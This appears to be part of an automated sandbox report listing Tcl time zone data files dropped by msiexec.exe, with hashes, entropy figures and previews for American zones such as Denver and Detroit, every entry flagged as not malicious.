                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):201
                                                                                                                                Entropy (8bit):4.876961543280111
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1128
                                                                                                                                Entropy (8bit):3.8794180227436557
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2967
                                                                                                                                Entropy (8bit):3.9564096415565855
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1940
                                                                                                                                Entropy (8bit):4.024810417421672
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8920
                                                                                                                                Entropy (8bit):3.8540632258197514
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8430
                                                                                                                                Entropy (8bit):3.826664943157435
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):202
                                                                                                                                Entropy (8bit):4.86856578093135
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8600
                                                                                                                                Entropy (8bit):3.8579895970456137
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1230
                                                                                                                                Entropy (8bit):3.7989525000422963
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):279
                                                                                                                                Entropy (8bit):4.760311149376001
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):190
                                                                                                                                Entropy (8bit):4.836337676384058
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4578
                                                                                                                                Entropy (8bit):3.8944281193962818
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):231
                                                                                                                                Entropy (8bit):4.778858143786314
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1423
                                                                                                                                Entropy (8bit):3.784027854102512
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8372
                                                                                                                                Entropy (8bit):3.8225708746657316
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):180
                                                                                                                                Entropy (8bit):4.973070790103308
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10353
                                                                                                                                Entropy (8bit):3.864463676759425
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
